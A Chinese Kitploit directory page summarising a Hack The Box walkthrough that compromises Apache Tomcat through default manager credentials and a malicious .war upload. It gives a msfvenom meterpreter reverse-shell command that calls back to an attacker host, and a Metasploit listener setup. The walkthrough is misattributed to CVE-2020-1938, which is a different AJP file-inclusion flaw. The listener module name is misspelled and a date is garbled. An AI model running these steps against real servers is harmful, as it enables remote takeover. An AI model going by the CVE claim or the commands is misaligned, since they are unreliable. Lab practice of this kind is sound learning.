Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/hopsypopsy8/cve-2020-1938-exploitation
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubhopsypopsy8/cve-2020-1938-exploitation

CVE-2020-1938-Exploitation

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

利用msfvenom和Metasploit在Hack The Box实验室环境中进行CVE-2020-1938(Apache Tomcat任意JSP上传导致远程代码执行)漏洞利用的逐步指南。

查看仓库
121年前尚未审核

CVE-2020-1938 漏洞利用

Apache Tomcat 任意 JSP 上传导致远程代码执行

描述

CVE-2020-1938 是一个影响 Apache Tomcat 9.0.0.M1 至 9.0.0.30、8.5.0 至 8.5.50 以及 7.0.0 至 7.0.99 版本的严重漏洞。⚠️ 该漏洞已在 Hack The Box 实验室中被利用。

🔗 参考: NIST NVD 条目

侦察

识别攻击向量

image
  1. 该网站对 服务器状态 功能使用了默认凭据。

  2. 该界面显示版本为 Apache Tomcat/7.0.88,64 位架构。

  3. 从该界面我们导航到列出应用程序的位置,该位置暴露了 .war 文件 上传 功能。

  4. 上传成功后,.war 文件会在 /directory/filename 路径下执行。

  5. 对 Apache Tomcat 版本的研究确认了 CVE-2020-1938 漏洞。

  6. 漏洞利用

生成 .war 文件

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war

使用 msfvenom(Metasploit 载荷生成器)生成我们的 exploit.war 载荷。

  1. -p windows/x64/meterpreter_reverse_tcp 是载荷类型(在本例中为 64 位,如服务器状态中所识别)
  2. LHOST=10.10.14.3 LPORT=3004 是攻击者机器的反向连接详细信息
  3. -f war 是文件类型
  4. -o exploit.war 输出文件名

生成文件后,进入文件并找到 .jsp 文件名,例如 gcvxdtmxvw.jsp,并保存以备后用。

设置 Metasploit

msfconsole
use exploit/multi/hanlder
Set LHOST 10.10.14.3
Set LPORT 3004

使用 msfconsole 设置一个监听器,等待我们的载荷被执行。

上传并运行恶意文件

image image

我们在部署部分上传我们的镜像,之后刷新屏幕,发现文件已成功上传。要完成漏洞利用,我们必须导航到路径 ip/hacked/gcvxdtmxvw.jsp。

image

这会导致请求挂起,但我们能够在本地机器上看到我们有一个反向连接。

下载工具